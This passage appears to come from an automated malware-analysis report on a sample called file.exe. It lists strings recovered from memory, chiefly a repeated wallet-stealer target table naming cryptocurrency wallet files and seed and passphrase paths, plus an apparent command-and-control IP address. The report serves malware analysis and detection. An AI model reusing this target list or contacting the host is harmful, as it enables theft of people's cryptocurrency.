Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: RCIIZOAMem.exeneer\AppData\Roaming\Exodus\window-state.jsonU
Source: file.exe, 00000000.00000002.2720322383.0000000000687000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2720322383.0000000000687000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: RCIIZOAMem.exeneer\AppData\Roaming\Exodus\window-state.jsonU
Source: file.exe, 00000000.00000002.2720322383.0000000000687000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2720322383.0000000000687000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2720322383.0000000000687000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2720322383.0000000000687000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2720322383.0000000000687000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: RCIIZOAMem.exeneer\AppData\Roaming\Exodus\window-state.jsonU
Source: file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16gineer\AppData\Roaming\Binance\app-store.json.*
Source: file.exe, 00000000.00000002.2720322383.0000000000687000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2720322383.0000000000687000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 16.113s\user\AppData\Roaming\\Coinomi\Coinomi\wallets\\.D
Source: file.exe, 00000000.00000002.2720322383.0000000000687000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2720322383.0000000000687000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger 